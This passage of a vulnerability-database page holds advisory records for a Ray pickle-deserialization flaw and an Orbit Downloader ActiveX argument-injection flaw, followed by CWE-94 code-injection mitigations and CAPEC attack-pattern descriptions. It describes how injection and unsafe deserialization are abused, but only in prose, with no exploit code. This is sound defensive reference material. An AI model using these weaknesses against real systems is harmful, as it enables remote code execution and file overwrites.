{
"type": "WEB",
"url": "https://github.com/ray-project/ray/pull/63470"
},
{
"type": "WEB",
"url": "https://github.com/ray-project/ray/commit/41443a18f9e6403a072de69098a279c23e2d943c"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/ray/PYSEC-2026-2273.yaml"
},
{
"type": "PACKAGE",
"url": "https://github.com/ray-project/ray"
},
{
"type": "WEB",
"url": "https://github.com/ray-project/ray/releases/tag/ray-2.56.0"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/ray-unsafe-deserialization-rce-via-webdataset-reader"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Ray: Arbitrary code execution via ray.data.read_webdataset default decoder: pickle.loads(value) and torch.load(weights_only=False)"
}
GHSA-HHX6-CRJV-6R4J
Vulnerability from github – Published: 2022-05-02 03:21 – Updated: 2022-05-02 03:21Argument injection vulnerability in orbitmxt.dll 2.1.0.2 in the Orbit Downloader 2.8.7 and earlier ActiveX control allows remote attackers to overwrite arbitrary files via whitespace and a command-line switch, followed by a full pathname, in the third argument to the download method.
{
"affected": [],
"aliases": [
"CVE-2009-1064"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2009-03-26T05:51:00Z",
"severity": "MODERATE"
},
"details": "Argument injection vulnerability in orbitmxt.dll 2.1.0.2 in the Orbit Downloader 2.8.7 and earlier ActiveX control allows remote attackers to overwrite arbitrary files via whitespace and a command-line switch, followed by a full pathname, in the third argument to the download method.",
"id": "GHSA-hhx6-crjv-6r4j",
"modified": "2022-05-02T03:21:27Z",
"published": "2022-05-02T03:21:27Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2009-1064"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/49353"
},
{
"type": "WEB",
"url": "https://www.exploit-db.com/exploits/8257"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/34200"
},
{
"type": "WEB",
"url": "http://www.waraxe.us/advisory-73.html"
}
],
"schema_version": "1.4.0",
"severity": []
}
Mitigation
Strategy: Refactoring
Refactor your program so that you do not have to dynamically generate code.
Mitigation
- Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which code can be executed by your product.
- Examples include the Unix chroot jail and AppArmor. In general, managed code may provide some protection.
- This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise.
- Be careful to avoid CWE-243 and other weaknesses related to jails.
Mitigation MIT-5
Strategy: Input Validation
- Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
- When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
- Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
- To reduce the likelihood of code injection, use stringent allowlists that limit which constructs are allowed. If you are dynamically constructing code that invokes a function, then verifying that the input is alphanumeric might be insufficient. An attacker might still be able to reference a dangerous function that you did not intend to allow, such as system(), exec(), or exit().
Mitigation
Use dynamic tools and techniques that interact with the product using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The product's operation may slow down, but it should not become unstable, crash, or generate incorrect results.
Mitigation MIT-32
Strategy: Compilation or Build Hardening
Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl's "-T" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184).
Mitigation MIT-32
Strategy: Environment Hardening
Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl's "-T" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184).
Mitigation
For Python programs, it is frequently encouraged to use the ast.literal_eval() function instead of eval, since it is intentionally designed to avoid executing code. However, an adversary could still cause excessive memory or stack consumption via deeply nested structures [REF-1372], so the python documentation discourages use of ast.literal_eval() on untrusted data [REF-1373].
CAPEC-242: Code Injection
An adversary exploits a weakness in input validation on the target to inject new code into that which is currently executing. This differs from code inclusion in that code inclusion involves the addition or replacement of a reference to a code file, which is subsequently loaded by the target and used as part of the code of some application.
CAPEC-35: Leverage Executable Code in Non-Executable Files
An attack of this type exploits a system's trust in configuration and resource files. When the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high.
CAPEC-77: Manipulating User-Controlled Variables
This attack targets user controlled variables (DEBUG=1, PHP Globals, and So Forth). An adversary can override variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the adversary can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.